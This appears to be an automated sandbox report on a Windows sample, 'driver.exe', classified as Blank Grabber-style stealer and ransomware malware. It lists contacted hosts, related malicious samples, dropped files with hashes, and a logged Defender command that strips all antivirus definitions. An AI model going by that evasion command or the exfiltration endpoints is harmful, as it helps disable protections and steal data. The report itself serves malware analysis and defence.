                                                                                                                                                                                                                      https://api.gofile.io/getServerdriver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngdriver.exe, 00000002.00000002.2440748716.000001C0EE2E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          208.95.112.1
                                                                                                                                                                                                                          ip-api.comUnited States
                                                                                                                                                                                                                          53334TUT-ASUSfalse
                                                                                                                                                                                                                          162.159.137.232
                                                                                                                                                                                                                          discord.comUnited States
                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                          127.0.0.1
                                                                                                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                          Analysis ID:1587410
                                                                                                                                                                                                                          Start date and time:2025-01-10 10:59:11 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 13m 9s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Number of analysed new started processes analysed:100
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:driver.exe
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal100.rans.troj.spyw.expl.evad.winEXE@161/105@2/3
                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                          • Successful, ratio: 50%
                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                          • Successful, ratio: 91%
                                                                                                                                                                                                                          • Number of executed functions: 111
                                                                                                                                                                                                                          • Number of non-executed functions: 177
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, WmiPrvSE.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 142.250.186.163, 20.109.210.53, 184.28.90.27, 13.95.31.18, 20.242.39.171, 13.107.246.45
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, e16604.g.akamaiedge.net, gstatic.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                                                                          • Execution Graph export aborted for target mshta.exe, PID 5396 because there are no executed function
                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 3560 because it is empty
                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 5652 because it is empty
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          05:00:08API Interceptor161x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                          05:00:09API Interceptor5x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                          05:00:13API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                          05:00:19API Interceptor3x Sleep call for process: SIHClient.exe modified
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          208.95.112.1XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          Comprobante.de.pago.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          p.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • ip-api.com/csv/?fields=query
                                                                                                                                                                                                                          rNuevaorden_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          I334hDwRjj.exeGet hashmaliciousBlank Grabber, NjratBrowse
                                                                                                                                                                                                                          • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                          startup_str_466.batGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          7dtpow.ps1Get hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          x.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          TR98760H.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          47SXvEQ.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                                                                                                                                                                                                          • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                          162.159.137.232I334hDwRjj.exeGet hashmaliciousBlank Grabber, NjratBrowse
                                                                                                                                                                                                                            paint.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                              hkMUtKbCqV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                  KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                    9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                      rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                                                        arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                                                                                            phost.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              discord.comI334hDwRjj.exeGet hashmaliciousBlank Grabber, NjratBrowse
                                                                                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                                                                                              random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                                                                                                              • 162.159.128.233
                                                                                                                                                                                                                                              random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                                                                                                              • 162.159.136.232
                                                                                                                                                                                                                                              47SXvEQ.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                                                                                                                                                                                                                              • 162.159.135.232
                                                                                                                                                                                                                                              P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 162.159.128.233
                                                                                                                                                                                                                                              paint.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                                                                                              hkMUtKbCqV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                                                                                              X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                                                                                              KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                                                                                              9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                              • 162.159.137.232
                                                                                                                                                                                                                                              ip-api.comXClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              Comprobante.de.pago.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              p.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              rNuevaorden_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              I334hDwRjj.exeGet hashmaliciousBlank Grabber, NjratBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              startup_str_466.batGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              7dtpow.ps1Get hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              x.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              TR98760H.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              47SXvEQ.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              CLOUDFLARENETUSXClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 104.20.4.235
                                                                                                                                                                                                                                              http://www.efnhdh.blogspot.mk/Get hashmaliciousGRQ ScamBrowse
                                                                                                                                                                                                                                              • 172.67.12.83
                                                                                                                                                                                                                                              gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                                                              http://pdfdrive.com.coGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 104.21.11.245
                                                                                                                                                                                                                                              RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                                                                                              https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 172.66.43.95
                                                                                                                                                                                                                                              http://www.singhs.lvGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                              • 104.18.11.207
                                                                                                                                                                                                                                              http://18ofcontents.shopGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                                                                              https://www.dcamarketintelligence.com/tdtGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 104.26.15.92
                                                                                                                                                                                                                                              1162-201.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                                                                              TUT-ASUSXClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              Comprobante.de.pago.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              p.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              rNuevaorden_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              I334hDwRjj.exeGet hashmaliciousBlank Grabber, NjratBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              startup_str_466.batGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              7dtpow.ps1Get hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              x.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              TR98760H.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              47SXvEQ.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                                              Entropy (8bit):0.8306905272278405
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugt:gJjJGtpTq2yv1AuNZRY3diu8iBVqFP
                                                                                                                                                                                                                                              MD5:769659D1022FB33632A276BE982BF6DB
                                                                                                                                                                                                                                              SHA1:DF3B373A0178BEC8B67D87EE91C0548B8AE06B78
                                                                                                                                                                                                                                              SHA-256:364BF3FF16A41AB0E80752D3097E4672276E91D51D1C43B036AB8F2473C1D839
                                                                                                                                                                                                                                              SHA-512:11703A0C42F7D5257A0B34C7CE938976D120E801CB35295E349647C469C3078DAE6FC18994A6CB1A683088BB60A648F97E00F831749B27863F7042A7DD3E9AAD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe46831d3, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                                              Entropy (8bit):0.6584842840997771
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:ZSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Zaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                              MD5:EADACE6927DBB24BDC93B63142B365CE
                                                                                                                                                                                                                                              SHA1:6EB6D5BA442F4214AE75FC47230590FCB4E93CFF
                                                                                                                                                                                                                                              SHA-256:2168FE7E8DFB843746467DBEF3927FAB188FACF380A701EE85D3FEF3B49C29D0
                                                                                                                                                                                                                                              SHA-512:EA81EBC3B2BC0A4B945E4D2ED24757506AE8DC4C8C413E2FB16010160594EFBDBF8E98C8E89C2D21072EF531D6EA908A69F1FFE6E78D352C98135766651994D8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:.h1.... ...............X\...;...{......................0.z..........{.......}..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{...................................7.z.....}C..................._......}#..........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                                              Entropy (8bit):0.07818325833862963
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:s/llKYef+YaVGuAJkhvekl1i6pillrekGltll/SPj:sXKzf+Y0rxlQCGJe3l
                                                                                                                                                                                                                                              MD5:8DAFF965988B490CCCC926C98B38B83A
                                                                                                                                                                                                                                              SHA1:62623C854639E46BBFDBED5969DD31CC435202B9
                                                                                                                                                                                                                                              SHA-256:8DBA680B19595322D13E56CB3EDA605B90429771508E99EDE096BE1D505E2F80
                                                                                                                                                                                                                                              SHA-512:6E4280A8DBD84CA6DAA335F4A25829EEEA8D93699A864CF4B4620EE98B70F0EA76295AFB1060046A21701922455189B8D9FAC8C25E319896EFC713682C862146
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:.\u......................................;...{.......}#......{...............{.......{...XL......{...................._......}#.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):691342
                                                                                                                                                                                                                                              Entropy (8bit):7.925039327654425
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:dIOFn+u1KSFgR8F4ORGQB9j2xQPHOVeVD495t359joxd0vfZ8sqQH1TSks1ELtgd:Smk7aUQBIxmuVeVD49zEd0v+3QVT5ta3
                                                                                                                                                                                                                                              MD5:12F0E375FD009BF03284B01686610ED0
                                                                                                                                                                                                                                              SHA1:67F8CAF68D65AEEA56CA1FFF4092CC22CFC76752
                                                                                                                                                                                                                                              SHA-256:2B6F46C447B431AE40E054821B63C3B6CC68F53810ABA8DDAD41AA702AD9EA3A
                                                                                                                                                                                                                                              SHA-512:9F65287A1E3B1FB2943C7B7DDFFD7143522DDEEB56272121E4667B10EB3C309000ECC897FA8B8F459953A67C097D85917E74FF84625C9B53062886AE958DDAF0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mU.......TWW..}}...]e..GWU.......h..K$...b*s.Q..E%H.1`..(..Dr..H..... ...=....[c?+..9...1..<c...9V.}=c.N..g...T...C..F...Nyz(....I.;,2g._......N.E/..E....{M..8.:~..qOT..?.a..$.......|...b...g.[3|..5Jg.##1u.xl .O.s.0u......P......p;......HL.6w..|.ej.t?..........?.(..7.S...;o:...e.#.VS..g....=.........Hg.....2..;..w..{no..HL.{nt.u.@.....'5.L....S.Hu.....L.m0K..W...z.@....z.3.o..:.G=.[.[2e...k..ps;.Z.z......xc...n....~7T.}.....j.~7.bz..2S.\.Gb>W....,Mu.5gt........j.....).=S)?.W..S<.t.tV.k...k2ZO.ym.[......{^]M...s.,}..-...[..5..7..=R. vO......WU.]..:;_....!}...ZP.t.k...fy...Ku..K.......tNw.....y.%.a..WVKwI.6...).v.<...6.b.k..s..k............y..!}../.L.pI....-.a........\.t..3KvJ...../O?.../...<j......3..a.5..a...6...Om....6..55..>LosI..#6.u:w...[^\Mm.<_.M...b../j.c.K.N...t.{..o..l.r[..i.z...n.......91.....m..<..yg......&..j.y|.9}.
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe
                                                                                                                                                                                                                                              File Type:RAR archive data, v5
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):724526
                                                                                                                                                                                                                                              Entropy (8bit):7.999731553052636
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:12288:XYZQI7eD9TVCPHiKysTf6xoD0B2JyXx0/6lZMEg/onUL9jhmrDG7v7+IN2ZwHoYa:XqQI7cTIPtr9DvyxJbMEgwnUL9jU/w7M
                                                                                                                                                                                                                                              MD5:535AA3CCC803D9976BC7590BAE5721B3
                                                                                                                                                                                                                                              SHA1:5C00538138C228419820AFDFCB4F14D396EBC0B5
                                                                                                                                                                                                                                              SHA-256:63DCF295E1AC64ECBD8460CBD8BFC75C605A27CCC53E2C03ED8BF3BF0F566D5A
                                                                                                                                                                                                                                              SHA-512:99B1FB360620B085CDC6E49F6D6428BB90160EE23AF6ACA42C9AFBE5150D709EF767CDBF56EA1EED9A08272DA66C5CC9F9284DE24B0625B51FF98751AFDCEFB7
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:Rar!........!.......I(.*qx..d=&,P...{.....qa0...c...c4...V/7A.[...M.j.H...6 E"8/...C........As.B.f.r...."..D.C..b.b...P..7Hg..*.jZT.*.\o. .k......;4^&`.d...4L5..^..d~N.).......a....\('U..2k{lbd....7.8..P}.B.:n..G...Z..E..Q.%.....6.,X].#.g.{3..p~.........<.l....=H.r.ty.....u....$...3..p.~,p.-.B>.=..."..)..S..).F.P.]-...........[.N.SD.Pz.s..,.(..8..Y!b......l.KZ.2..6..3....B....:f....p_R.l.6.2.L.i....j....0&.....u........j+. ..^.l4....1..8...Cf.Y......PO%.0`3..rgYx.z"...J...J.....li.D.......k....}....i.G.....k.E...-V.J{..*U.T_:.AR y....'.T4....8...Q...!(..7kc1..$..4."..@.T.~..,.YrC.*>...c....0.i...u.Rm.xh.*.}*R.&.pu.%8|wZ........M....y.....C.?O.&!.i:...X$^.d5..M.l.S.5...#Q.M.c......|...b.....B.#@.j.v,.B;..*.3I........H6.[Xt....)..[...e4..IJ.zz .c.x.F...)i...w0m..8Jh.}u2.7.....A......./....#.......Yi.gS.l~*.....K....... .^ C.v....~.........*.(1.SX.....}.._{;a.w"w...61.cV.'..*...|.q...]HL..3r...pa.|<P...s...0i..........=....
                                                                                                                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):894
                                                                                                                                                                                                                                              Entropy (8bit):3.101257634177589
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:Q58KRBubdpkoPAGdjrntk9+MlWlLehW51ICaM:QOaqdmOFdjrnS+kWResLIfM
                                                                                                                                                                                                                                              MD5:262E1BB39296B54C4D1E63A5651B691B
                                                                                                                                                                                                                                              SHA1:73AC4274BAF2969443C2B1F407D21C0023B257CD
                                                                                                                                                                                                                                              SHA-256:A30C784BA0622BCD7FF1EA079FFB90C318FDA502C5533A63BAC4E4077FA6E014
                                                                                                                                                                                                                                              SHA-512:843B9345031D053E2E5608BA2E47770E88E616C22DAD1B0C5984CED5A7B477E87532633B53533D2EB9292E07193263B4086367D5857C5A85A67B064440C506A9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. J.a.n. .. 1.0. .. 2.0.2.5. .0.5.:.0.0.:.2.4.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. J.a.n. .. 1.0. .. 2.0.2.5. .0.5.:.0.0.:.2.4.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ba, 9 symbols, created Fri Jan 10 11:44:43 2025, 1st section name ".debug$S"
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1376
                                                                                                                                                                                                                                              Entropy (8bit):4.130758400968359
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:HBO9gEQctHDwK9GoYNII+ycuZhNfakSRPNnqSQEgd:hELt0KZYu1ulfa3jqSZ0
                                                                                                                                                                                                                                              MD5:5218D9E30B9B60A298657EF500D61223
                                                                                                                                                                                                                                              SHA1:EF88B0BD3C66FB3D3C46780F1BD1D84911DA736C
                                                                                                                                                                                                                                              SHA-256:4683E73366E883A0A9A85946AE520F8398BD35D9E1812CBD4421039D4FC66DBD
                                                                                                                                                                                                                                              SHA-512:29B7AC360A9CBEEF73D26E10279D7CAE6A32C1A712EEF18337A422AFA32C75CFD75764DF256ABA11DCD6DFF9E1C3194026F9D8F363661ACB208A841AB44FCF5C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
